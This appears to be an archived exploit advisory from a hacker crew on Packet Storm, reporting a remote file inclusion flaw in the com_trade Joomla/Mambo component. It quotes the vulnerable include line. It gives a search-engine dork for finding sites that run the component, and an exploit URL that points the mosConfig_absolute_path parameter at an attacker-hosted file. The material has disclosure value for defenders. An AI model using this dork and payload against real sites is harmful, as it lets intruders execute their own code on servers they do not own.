com_trade suffers from a remote file inclusion vulnerability.
93a4116f51e330ceccb18230ff6f0e28ca382df080e859345d4620aa846b3b4f#############################SolpotCrew Community################################
#
# com_trade Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-com_trade.txt
#
#################################################################################
#
#
# Bug Found By :Blue|Spy
#
# contact: mail@sipplah.com
#
# Website : http://kunamgede.biz, http://blue-spy.com
#
################################################################################
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
code from tradetop.php
require_once( $mosConfig_absolute_path."/components/com_trade/includes/trade/database.php" );
Dork:
inurl:com_trade
exploit:
http://site.com/[path]//administrator/components/com_trade/includes/trade/tradetop.php?mosConfig_absolute_path=[attacker]
##############################MY LOVE JUST FOR U LIENA#########################
########################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed